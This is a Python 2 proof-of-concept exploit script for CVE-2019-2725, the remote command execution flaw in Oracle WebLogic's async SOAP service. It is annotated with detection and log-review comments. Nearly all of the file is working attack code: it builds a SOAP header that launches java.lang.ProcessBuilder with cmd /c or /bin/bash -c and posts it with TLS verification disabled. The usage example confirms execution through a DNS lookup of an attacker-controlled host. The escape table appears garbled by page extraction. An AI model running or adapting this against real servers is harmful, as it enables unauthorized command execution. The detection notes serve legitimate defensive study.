cve-2019-2725.py
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's InsecureRequestWarning for the whole process. The POST in
# exploit() is sent with verify=False, so with this line in place a failed or
# absent certificate check produces no visible warning at all.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Build the SOAP envelope that this CVE-2019-2725 proof-of-concept sends.
#
# Parameters:
#   cmd      -- command string; every character is looked up in
#               html_escape_table and the result is wrapped in <string>...</string>.
#   cmd_base -- ready-made "<string>...</string>\r\n" element placed at array index 0.
#   cmd_opt  -- ready-made "<string>...</string>\r\n" element placed at array index 1.
# Returns the complete envelope as a single string.
#
# Only cmd goes through the escape table; cmd_base and cmd_opt are concatenated
# into the XML exactly as passed in.
#
# Detection-relevant shape of the request body: a <work:WorkContext> SOAP header
# (namespace http://bea.com/2004/06/soap/workarea/) that contains a
# <void class="java.lang.ProcessBuilder"> element holding a three-entry
# java.lang.String array, followed by <void method="start"/>. The body itself is
# just an empty <asy:onAsyncDelivery/>. A request whose WorkContext header names
# java.lang.ProcessBuilder is the pattern to alert on or block at a proxy/WAF
# (presumably never present in legitimate traffic -- confirm for your environment).
def create_payload(cmd, cmd_base, cmd_opt):
# NOTE(review): as rendered on this page the table below maps each character to
# itself and the '"' entry is not valid Python; the entity values look like they
# were decoded during page extraction. Treat this listing as non-runnable and
# compare with the upstream file before relying on it.
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
cmd_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in cmd)+"</string>\r\n"
payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n" \
"<soapenv:Header>\r\n" \
"<wsa:Action>xx</wsa:Action>\r\n" \
"<wsa:RelatesTo>xx</wsa:RelatesTo>\r\n" \
"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n" \
"<void class=\"java.lang.ProcessBuilder\">\r\n" \
"<array class=\"java.lang.String\" length=\"3\">\r\n" \
"<void index=\"0\">\r\n" \
+ cmd_base + \
"</void>\r\n" \
"<void index=\"1\">\r\n" \
+ cmd_opt + \
"</void>\r\n" \
"<void index=\"2\">\r\n" \
+ cmd_filtered + \
"</void>\r\n" \
"</array>\r\n" \
"<void method=\"start\"/></void>\r\n" \
"</work:WorkContext>\r\n" \
"</soapenv:Header>\r\n" \
"<soapenv:Body>\r\n" \
"<asy:onAsyncDelivery/>\r\n" \
"</soapenv:Body>\r\n" \
"</soapenv:Envelope>"
return payload
# POST the envelope from create_payload() to url as text/xml and print the outcome.
#
# Parameters:
#   url -- endpoint to post to; the script's usage text shows a URL ending in
#          /_async/AsyncResponseService.
#   cmd -- command string, forwarded unchanged to create_payload().
# Prints one status line and returns nothing.
#
# For log review: the request is a POST with content-type text/xml to that
# endpoint, and the script treats an HTTP 202 response as success.
def exploit(url, cmd):
header = {'content-type': 'text/xml'}
# cmd_base and cmd_opt are not parameters of this function: they are read from
# module-level globals set by the target selection at the bottom of the script,
# so calling exploit() before that code has run raises NameError.
# verify=False disables TLS certificate validation for this request.
result = requests.post(url, create_payload(cmd, cmd_base, cmd_opt), headers = header,verify=False)
# The status code is the only thing inspected; the response body is never read.
# "Command executed" therefore means the server answered 202, not that the
# script saw any output from the command.
if(result.status_code == 202):
print "Command executed"
else:
print "Exploit attempt failed"
# Script entry: parse <url> <target> <command> from the command line, pick the
# shell wrapper for the chosen platform, then call exploit().
# The print statements here and above are Python 2 syntax.
#
# Exactly three arguments are required; otherwise print usage and exit with status 1.
# The usage example's command is a DNS lookup of an externally controlled name,
# i.e. execution is confirmed out of band rather than from the HTTP response.
# NOTE(review): the matching defensive signal is presumably unexpected outbound
# DNS or process creation from the application server -- confirm against your telemetry.
if(len(sys.argv) != 4):
print 'usage: python cve-2019-2725.py <url> <target> <command>'
print 'ex: python cve-2019-2725.py https://localhost:7001/_async/AsyncResponseService 1 \'nslookup myburpcollaboratorurl\''
print 'targets:'
print ' (1) Windows'
print ' (2) Linux'
sys.exit(1)
url = sys.argv[1]
# int() raises ValueError on a non-numeric target; that case is not caught here.
target = int(sys.argv[2])
cmd = sys.argv[3]
# cmd_base / cmd_opt become module globals that exploit() reads directly. They
# fill array slots 0 and 1 of the payload: "cmd /c" for target 1, "/bin/bash -c"
# for target 2, with the user-supplied command in slot 2.
if(target == 1):
cmd_base = "<string>cmd</string>\r\n"
cmd_opt = "<string>/c</string>\r\n"
elif(target == 2):
cmd_base = "<string>/bin/bash</string>\r\n"
cmd_opt = "<string>-c</string>\r\n"
else:
# Any other target number exits with status -1.
print 'Invalid Target'
sys.exit(-1)
exploit(url, cmd)